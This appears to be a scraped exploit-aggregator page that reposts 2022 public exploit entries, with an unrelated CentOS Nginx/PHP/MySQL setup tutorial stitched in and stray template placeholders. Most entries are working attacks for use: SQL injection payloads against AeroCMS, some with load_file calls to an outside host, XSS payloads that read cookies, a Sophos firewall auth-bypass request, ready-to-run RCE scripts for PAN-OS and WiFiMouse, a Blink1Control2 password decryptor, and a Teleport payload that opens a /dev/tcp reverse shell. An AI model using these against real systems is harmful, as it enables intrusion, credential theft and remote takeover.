# Title: Aero CMS v0.0.1 - SQLi # Author: nu11secur1ty # Date: 08.27.2022 # Vendor: https://github.com/MegaTKC # Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi # Description: The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: author (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4 --- ```
HireHackking
# Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: Debian / WordPress 6.0.1 # CVE : CVE-2022-2941 # Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c # 1. Technical Description: The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page. # 2. Proof of Concept (PoC): a. Install and activate version 2.88.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings). c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use the following payload: <script>alert(/XSS/)</script> d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload will be executed. Note: This change will be permanent until you modify the edited fields.
HireHackking

Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass # Date: 2022-08-04 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.sophos.com # Version: 17.0.10 MR-10 # Tested on: Windows 11 # CVE : CVE-2022-1040 # [ VULNERABILITY DETAILS ] : #This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication. # [ SAMPLE REQUEST ] : POST /webconsole/Controller HTTP/1.1 Host: 127.0.0.1:4444 Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/plain, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Origin: https://127.0.0.1:4444 Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 192 mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066 # [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,... # [ Successful response ] : HTTP/1.1 200 OK Date: Thu, 04 Aug 2022 17:06:39 GMT Server: xxxx X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/plain;charset=utf-8 Content-Length: 53 Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly Connection: close {"redirectionURL":"/webpages/index.jsp","status":200}
HireHackking

PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-08-13 # Exploit Author: UnD3sc0n0c1d0 # Software Link: https://security.paloaltonetworks.com/CVE-2020-2038 # Category: Web Application # Version: <10.0.1, <9.1.4 and <9.0.10 # Tested on: PAN-OS 10.0 - Parrot OS # CVE : CVE-2020-2038 # # Description: # An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated # administrators to execute arbitrary OS commands with root privileges. # More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ # Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue. #!/usr/bin/env python3 import requests import urllib3 import sys import getopt import xmltodict urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def banner(): print('\n###########################################################################') print('# Proof of Concept for CVE-2020-2038 #') print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of #') print('# Positive Technologies #') print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #') print('# #') print('# Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0) #') print('###########################################################################') def exploit(target,user,password,command): apiparam = {'type': 'keygen', 'user': user, 'password': password} apiresponse = requests.get(target+'api/', params=apiparam, verify=False) xmlparse = xmltodict.parse(apiresponse.content) apikey = xmlparse['response']['result']['key'] payload = '<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||'+command+'||]]></pattern></cms-ping>' parameters = {'cmd': payload, 'type': 'op', 'key': apikey} response = requests.get(target+'api', params=parameters, verify=False) print(response.text[50:-20]) def usage(): print('\nusage: CVE-2020-2038.py\n\n') print('arguments:') print(' -h show this help message and exit') print(' -t target URL (ex: http://vulnerable.host/)') print(' -u target administrator user') print(' -p pasword of the defined user account') print(' -c command you want to execute on the target\n') def main(argv): if len(sys.argv) < 9: banner() usage() sys.exit() try: opts, args = getopt.getopt(argv,"ht:u:p:c:") except getopt.GetoptError: banner() usage() sys.exit() for opt, arg in opts: if opt == '-h': usage() sys.exit() if opt == '-t': target = arg if opt == '-u': user = arg if opt == '-p': password = arg if opt == '-c': command = arg banner() exploit(target,user,password,command) sys.exit() if __name__ == "__main__": try: main(sys.argv[1:]) except KeyboardInterrupt: print('Interrupted by users...') except: sys.exit()
HireHackking
# Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS) # Date: 08/08/2022 # Exploit Author: saitamang, syad, yunaranyancat # Vendor Homepage: wordpress.org # Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip # Version: 1.0 # Tested on: Centos 7 apache2 + MySQL WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected. Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.
HireHackking

Title: Centos7/8 Install Nginx PHP7.X Mysql8.0

HACKER · %s · %s

There are many tutorials on this aspect, but they are all a bit flawed. In actual operation, there are various pitfalls, in order to avoid pitfalls. This article will present the most comprehensive construction tutorial for beginners.
Installation Environment
Nginx1.2PHP7.xMysql8.0
Installing Nginx
To add the CentOS 7 EPEL repository, run the following command:
yum install epel-release install Nginx
yum install nginx starts Nginx service
systemctl start nginx boot
sudo systemctl enable nginx
Install Mysql8.0
Add mysql library
yum localinstall https://dev.mysql.com/get/mysql80-community-release-el7-1.noarch.rpm install mysql
yum --enablerepo=mysql80-community install mysql-community-server starts mysql
systemctl start mysqld.service modify root password
Because in mysql8, the default password will be set when installing the database. We can use the following command to view the default password
grep 'A temporary password is generated for root@localhost' /var/log/mysqld.log |tail -1 Initialize the database
sudo mysql_secure_installation will prompt for root's password, which is the default password obtained in the previous step. Then enter the root password again and enter Y all the way.
I don’t know why, but the program cannot connect to log in after modification. Use the following command to re-modify the root password.
mysql -u root -p
use mysql;
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'youpassword';
systemctl restart mysqld #Restart MySQL
Installation PHP
Install Remi Repository
yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm Check for available PHP 7+ versions in the Remi repository
yum --disablerepo='*' --enablerepo='remi-safe' list php[7-9][0-9].x86_64 You will see such output
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
* remi-safe: mirrors.ukfast.co.uk
Available Packages
php70.x86_64 2.0-1.el7.remi remi-safe
php71.x86_64 2.0-1.el7.remi remi-safe
php72.x86_64 2.0-1.el7.remi remi-safe
php73.x86_64 2.0-1.el7.remi remi-safe
php74.x86_64 1.0-3.el7.remi remi-safe
php80.x86_64 1.0-3.el7.remi enables the corresponding PHP version (see 7.4 as an example here)
sudo yum-config-manager --enable remi-php74 install php
yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrp php-zip php-cli php-fpm php-gd php-mysqlnd php-mbstring php-opcache php-pdo php-json
Configuration File
Configure php-fpm file
vim /etc/php-fpm.d/www.confuser and group variables default to apache. We need to change these to nginx
Finding listen php-fpm will listen on specific hosts and ports over TCP. We want to change this setting so that it listens for local socket files, as this improves overall performance of the server.
listen=/var/run/php-fpm/php-fpm.sock; Finally, we need to change the owner and group settings of the socket file we just defined in the listen directive. Find the listen.owner, listen.group and listen.mode directives. These lines are commented out by default. Uncomment by deleting the prefix at the beginning of the line. Then, change the owner and group to nginx:
listen.owner=nginx
listen.group=nginx
listen.mode=0660 Last restart php-fpm
systemctl start php-fpm
Configure Nginx to handle PHP
The current configuration is that the php file cannot be accessed, and we still need a simple configuration.
Nginx has a dedicated directory where we can define each hosted website as a separate configuration file using a server block. This is similar to Apache's virtual hosting.
In the default installation, this directory is empty. We will create a new file as the default PHP website on this server, which will override the default server block defined in the /etc/nginx/nginx.conf file.
Open a new file in the /etc/nginx/conf.d directory
vim /etc/nginx/conf.d/default.conf
#The content is as follows:
server {
listen 80; # port can be modified by itself, such as 8080
server_name 192.168.x.x; #If you don't have a domain name, just fill in the public or intranet IP
root /var/www/html; #Website Lu Jin
index index.php index.html index.htm;
location/{
try_files $uri $uri/=404;
}
error_page 404 /404.html;
error_page 500 502 503 504 /50x.html;
location=/50x.html {
root /var/www/html; #Website Lu Jin
}
#php configuration part
location ~ \.php$ {
try_files $uri=404;
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
}Restart Nginx to apply the changes:
sudo systemctl restart nginx
Configure website directory user groups and permissions
Because currently both php and nginx are running as nginx, and our directory sometimes has permissions owned by root. So when visiting the website, 404 will appear.
First check the user groups of php and ngxin
ps -ef | grep php
ps -ef | grep nginx last modify user group permissions for the corresponding directory
chown -R nginx:nginx /var/www/blog and restart php and nginx again
Configure PATHINFO
Like Typecho, we need to enable PATHINFONginx, which does not support PATHINFO by default, so we need to change the configuration file of the host that supports PATHINFO.
location ~ ^(.+\.php)(.*)$ {
fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
include fastcgi_params;
} and configure etc/php.ini
cgi.fix_pathinfo=1 Finally restart nginx and php
There are so many problems we have encountered at the moment. Let’s talk about the problems we encounter later!
HireHackking
# Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass # Date: 2022-08-11 # Exploit Author: JORDAN GLOVER # Type: WEBAPPS # Platform: HARDWARE # Vendor Homepage: https://www.buffalotech.com/ # Model: TeraStation Series # Firmware Version: 1.66 # Tested on: Windows 10 An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges. The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS. Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body. If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS. POC #1 Authentication Failure Request POST /dynamic.pl HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/static/index.html bufaction=verifyLogin&user=Jordan&password=Jordan Response HTTP/1.1 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Date: Mon, 30 Jun 2008 02:39:51 GMT Server: lighttpd/1.4.32 Content-Length: 94 {"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]} Incorrect Username or Password POC #2 Authentication Success Request POST /dynamic.pl HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://localhost Connection: close Referer: http://localhost/static/index.html bufaction=verifyLogin&user=Jordan&password=Jordan Intercepted Response HTTP/1.1 200 OK Content-type: text/html Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Date: Mon, 30 Jun 2008 02:39:51 GMT Server: lighttpd/1.4.32 Content-Length: 94 {"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]} Login Successful
HireHackking

Blink1Control2 2.2.7 - Weak Password Encryption

HACKER · %s · %s

// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption // Date: 2022-08-12 // Exploit Author: p1ckzi // Vendor Homepage: https://thingm.com/ // Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7 // Vulnerable Version: blink1control2 <= 2.2.7 // Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11. // CVE: CVE-2022-35513 // // Description: // the blink1control2 app (versions <= 2.2.7) utilises an insecure method // of password storage which can be found by accessing the /blink1/input url // of the api server. // password ciphertext for skype logins and email are listed // and can be decrypted. example usage: // node blink1-pass-decrypt <ciphertext> #!/usr/bin/env node const {ArgumentParser} = require('argparse'); const simpleCrypt = require('simplecrypt'); function exploit() { const BANNER = '\033[36m\n\ _ _ _ _ _\n\ | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\ | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\ | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\ |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\ |_|\n\ _ _\n\ __| | ___ ___ _ __ _ _ _ __ | |_\n\ / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\ | (_| | __| (__| | | |_| | |_) | |_\n\ \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\ |___/|_|\033[39m'; const PARSER = new ArgumentParser({ description: 'decrypts passwords found at the /blink/input url ' + 'of the blink1control2 api server (version <= 2.2.7 ).' }); PARSER.add_argument('ciphertext', { help: 'encrypted password string to use', type: 'str' }); let args = PARSER.parse_args(); // supplied ciphertext is decrypted with same salt, password, and method // used for encryption: try { let crypt = simpleCrypt({ salt: 'boopdeeboop', password: 'blink1control', method: 'aes-192-ecb' }); let ciphertext = args.ciphertext; let decrypted = crypt.decrypt(ciphertext); console.log(BANNER); console.log('\033[32m[+] decrypted password:\033[39m'); console.log(decrypted); } catch (TypeError) { console.log('\033[33m[!] the submitted hash was invalid.\033[39m'); } finally { process.exit(1); } } exploit()
HireHackking

WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE) # Date: 15-08-2022 # Author: Febin # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.4 # Tested on: Windows 10 #!/bin/bash printf " WiFiMouse / MouseServer 1.8.3.4 Exploit by FEBIN " printf "[*] Enter the Target IP Address: " read TARGET rce(){ printf "[*] Enter the Command to execute on the Target: " read CMD sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978 } dirlist(){ echo "[*] User's Home Directory Contents:" echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2- while $true do printf "\nList Directory:> " read DIR echo "[+] Contents of $DIR: " echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2- done } printf " [1] Remote Command Execution [2] Directory Listing " printf "Enter Your Choice (1 or 2) : " read CHOICE if [[ $CHOICE == "1" ]] then rce elif [[ $CHOICE == "2" ]] then dirlist else echo "[-] Invalid Choice!" fi
HireHackking

Teleport v10.1.1 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE) # Date: 08/01/2022 # Exploit Author: Brandon Roach & Brian Landrum # Vendor Homepage: https://goteleport.com # Software Link: https://github.com/gravitational/teleport # Version: < 10.1.2 # Tested on: Linux # CVE: CVE-2022-36633 Proof of Concept (payload): https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2= f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3= 0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?= method=3Diam Decoded payload: " /bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
HireHackking
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) # Date: 28/08/2022 # Exploit Author: Ashkan Moghaddas # Vendor Homepage: https://testa.cc # Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip # Version: 3.5.1 # Tested on: Windows/Linux # Proof of Concept: # 1- Install Testa 3.5.1 # 2- Go to https://localhost.com/login.php?redirect=XXXX # 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E # 4- XSS has been triggered. # Go to this url " https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E " XSS will trigger.
HireHackking
# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://profiles.wordpress.org/3dady/ # Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.0.1 # CVE : N/A # 1. Technical Description: The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady). c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text): " autofocus onfocus=alert(/XSS/)> d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed. Note: This change will be permanent until you modify the edited fields.